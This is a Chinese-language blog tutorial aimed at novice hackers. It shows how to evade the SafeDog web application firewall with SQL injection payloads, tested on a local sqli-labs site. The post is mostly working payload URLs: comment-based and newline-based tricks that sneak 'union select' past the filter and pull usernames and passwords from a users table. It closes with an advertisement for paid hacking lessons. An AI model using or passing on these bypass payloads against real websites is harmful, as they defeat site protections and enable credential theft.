黑客入门新手特训 2019-1.20bypass最新版过狗姿势_奈斯资源网

黑客入门新手特训 2019-1.20bypass最新版过狗姿势

时间:2019/1/20 12:22:52 作者:安琪 来源:www.nicezy.com 阅读:55 评论:0
内容摘要:很多新手朋友跑来为安琪遇到安全狗怎么办,好烦恼啊!问我怎么去绕过。。。于是安琪就在本地搭建了一个环境去测试系统:win7x64+phpstudy+安全狗apache版v4.0站点:sqli-labsbypassMysql注释符:#,--,/*...*/Mysql空白字符:%09,%0a,%0b,%0c,%0d,%20...


很多新手朋友跑来为安琪遇到安全狗怎么办,好烦恼啊!问我怎么去绕过。。。

于是安琪就在本地搭建了一个环境去测试 黑客入门新手特训
系统:win7x64+phpstudy+安全狗apache版 v4.0

站点:sqli-labs
c4ca4238a0b923820dcc-1.png

bypass

Mysql 注释符:# , -- , /*...*/ Mysql 空白字符:%09,%0a,%0b,%0c,%0d,%20,%a0

绕过 and 1=1

首先判断是否有注入点:
正常情况:http://192.11.22.55/sqli/Less-1/?id=1' and 1=1 %23 (安全狗拦截)
把and 1=1拆分:
http://192.11.22.55/sqli/Less-1/?id=1' and %23 (安全狗不拦截)
所以要把and和1=1当成两部分,在它们之间进行干扰。经过一番测试用/*!..*/就能绕过,payload:/*!..*/(在星号后加惊叹号,那么此解释里的语句将被执行)
http://192.11.22.55/sqli/Less-1/?id=1' and /*!1=1*/ %23 (安全狗不拦截)

c4ca4238a0b923820dcc-2.png

绕过 order by

正常情况:http://192.11.22.55/sqli/Less-1/?id=1' order by 1,2,3 %23 (安全狗拦截)
http://192.11.22.55/sqli/Less-1/?id=1' order by %23 (安全狗不拦截)
所以把order by和1,2,3,x当成两部分,继续干扰。用刚刚的思路/*!..*/绕过
http://192.11.22.55/sqli/Less-1/?id=1' order by /*!1,2,3*/ %23 (安全狗不拦截)

c4ca4238a0b923820dcc-3.png

绕过 union select

测试:http://192.11.22.55/sqli/Less-1/?id=-1' union select %23 (安全狗拦截)


尝试之前的思路union /*!select*/1,2,3 (安全狗拦截)
多次测试之后发现,需要在union和select之间进行干扰,当时这里绕了很久,没绕过去,但总感觉能弄出来。好吧,弄久了没啥灵感就去网上搜搜思路。看到了篇今年5月份的帖子

c4ca4238a0b923820dcc-4.png

payload:e66union(/*(x/*–*\/)*/select1,2),结果被杀了


c4ca4238a0b923820dcc-5.png

冷静了一下发现空白字符没用到啊!!
拿%0a去url解码发现有换行的功能,比如

select *from admin where id=-1 union %0aselect 1,2,3

c4ca4238a0b923820dcc-6.png

可以正常的查询
 

c4ca4238a0b923820dcc-7.png


于是get到点了,最终payload:

union /*|--|*/--+%0aselect 1,2,3 http://192.11.22.55/sqli/Less-1/?id=-1'union /*|--|*/--+%0aselect 1,2,3%23 (安全狗不拦截)

c4ca4238a0b923820dcc-8.png

绕过 union select 1,2,3 from users

利用刚刚绕过union select的payload,即可绕过,总的来说哪里拦截就干扰哪里。

payload:

union /*|--|*/--+%0aselect 1,username,password from /*|--|*/--+%0ausers limit 1,2http://192.11.22.55/sqli/Less-1/?id=-1'union /*|--|*/--+%0aselect 1,username,password from /*|--|*/--+%0ausers limit 1,2%23 (安全狗不拦截)

c4ca4238a0b923820dcc-9.png
完了


标签:黑客入门 黑客入门新手特训 bypass安全狗 

☆文章出处:奈斯资源网

本站网址:http://www.nicezy.com/

站长邮箱:1437232096@qq.com

站长收徒:学习全部技术只需100元,享受终身会员,学会为止,必成网络大神!